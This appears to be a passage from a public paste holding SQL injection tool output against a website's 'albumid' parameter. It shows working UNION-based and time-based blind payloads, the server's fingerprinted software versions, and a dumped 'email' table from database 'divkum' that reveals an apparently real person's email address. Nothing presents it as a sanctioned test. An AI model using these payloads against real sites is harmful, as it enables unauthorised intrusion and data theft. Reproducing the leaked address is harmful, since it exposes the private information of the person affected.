  983. Payload: albumid=-2305' UNION ALL SELECT NULL,CONCAT(0x716c727371,0x44476163577753576d57,0x7164727671),NULL,NULL,NULL,NULL#
  984.  
  985. Type: AND/OR time-based blind
  986. Title: MySQL > 5.0.11 AND time-based blind
  987. Payload: albumid=21' AND SLEEP(5) AND 'PkYW'='PkYW
  988. ---
  989. web server operating system: Linux Debian 6.0 (squeeze)
  990. web application technology: PHP 5.3.3, Apache 2.2.16
  991. back-end DBMS: MySQL 5.0.11
  992. Database: divkum
  993. Table: email
  994. [1 entry]
  995. +------------------------------------+
  996. | nasehat |
  997. +------------------------------------+
  998. | masade.soedarmadi@infosolusi.co.id |
  999. +------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement